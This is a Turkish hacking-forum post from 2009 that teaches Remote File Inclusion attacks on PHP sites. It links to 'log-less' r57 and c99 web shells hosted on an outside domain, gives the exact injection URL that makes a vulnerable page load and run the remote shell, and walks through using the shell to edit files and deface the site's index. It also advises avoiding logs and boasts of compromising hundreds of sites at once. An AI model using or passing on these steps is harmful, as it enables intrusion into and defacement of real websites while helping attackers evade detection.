By.BiCi Admin
Rep Gücü : 401 Rep Puanı : 10
| Konu: Web Hack | RFI [ Remote File Inclusioın ] Açığı Salı Mart 17, 2009 10:05 pm | |
| Arkadaşlar baktım ki bu bölümde saçma, gereksiz ve de doğal olarak işe yaramayan konular açılmış. Bu kötü gidişe dur demek için ben bi yöntem sunucam bugün ve inş. bundan sonra o tür konuları bidaha görmeyiz, gerçekçi yollardan devam ederiz.
Nedir bu RFI be aga fln demeyin bu RFI, SQL kadar baba olmasa da en yaygın yöntemdir diyebiliriz. x.php sayfası vardır ve x.php sayfasında webmasterımızın karışılıksız bıraktığı bi girdi vardır. O girdiye değer vermemiştir. O girdiye biz "root" diyelim. Bu girdinin değeri olmadığı zaman bizim shellimizi yiyebilir demektir. Peki nasıl shellimizi yedirebiliriz? Önce shell nedir öğrenelim. Shell diyince aklımıza ilk olarak r57 ve c99 bu ikisini bileceğiz arkadaşlar. Bunlar temel sheller ve açıkçası en çok kullanılanlar. Bunların logsuz, kendinden masslı hatta c99'un da c100 çeşidi çıktı. Logsuz kullanmanızı tavsiye ederim çünkü log tutmaz, yani kayıt tutmaz. Logsuz bi-iki shell örneği vereyim size hemen. r57: http://karavana.gen.tr/r.txtc99: http://karavana.gen.tr/c99.txt. Peki nasıl kullanırız biz bu shelleri derseniz hemen biz geyiği bırakıp x.php sayfasına ve "root" değerine geri dönelim.
Dediğim gibi şimdi x.php sayfamızda "root" girdisi karşılıksız bırakılmış ve biz hemen dolduruyoruz. Bu karışılıksız bırakma bir açıktır arkadaşlar. Nasıl dolduruyoruz derseniz sayfa.php?açıkbırakılangirdi=shelladresi? [ sonuna o ?'i mutlaka ekleyin. ] yani
siteadresi.com/x.php?root=http://karavana.gen.tr/r.txt? [ parçaları ayrı ayrı gösterdim ]
olarak kullanıcaz. Bu şartlarda siteye shell sokmuş olduk. Eğer yazma izniniz varsa arkadaşlar bu shellerde sayfalarınızı editleyebilir indexinizi upload edebilirsiniz. Tabiki sadece Safe Mode Offken ve yazma izni varken. Yani CHMOD 0777 iken. Bunu nası anlarsınız? Yukarıda Safe Mode: OFF[No Security] yazar. Ve aşağıda dosyanın karşısındaki boşlukta yeşil olarak r-rw fln yazar. Orda hemen o yazının sağında 3 tane kutu gibi simge vardır. Biz editlemek için ortadakini kullanırız üstünde kalem işareti vardır. O kalem işaretli olana tıkladığımızda o sayfanın kodları bulunan sayfa açılır. Yani diyelim biz aa.com/x.php?root=http://karavana.gen.tr/r.txt? adresinde açık bulduk shell soktuk tarif ettiğim gibi geldik aa.com/ ve aa.com/aaa'daki yani dizinlerindeki izin verilen dosyaları editleriz. O kod satırlarına geldiğimizde index kodlarımızı yapıştırırız sonra hemen yukarıda SAVE yazar buna tıklarız ve indeximiz kaydedilmiş olur. Bu RFI açığında server rootlayabilir aynı anda 600-700 site hackleyebilirsiniz.
Biliyorum karışık oldu ama en kısa zamanda video çekicem
Infiltrat0r
Not: Ben video çekene kadar RFI, c99, r57, CHMOD konusunda araştırma yaparsanız bişeyler öğrenebilirsiniz
| |
|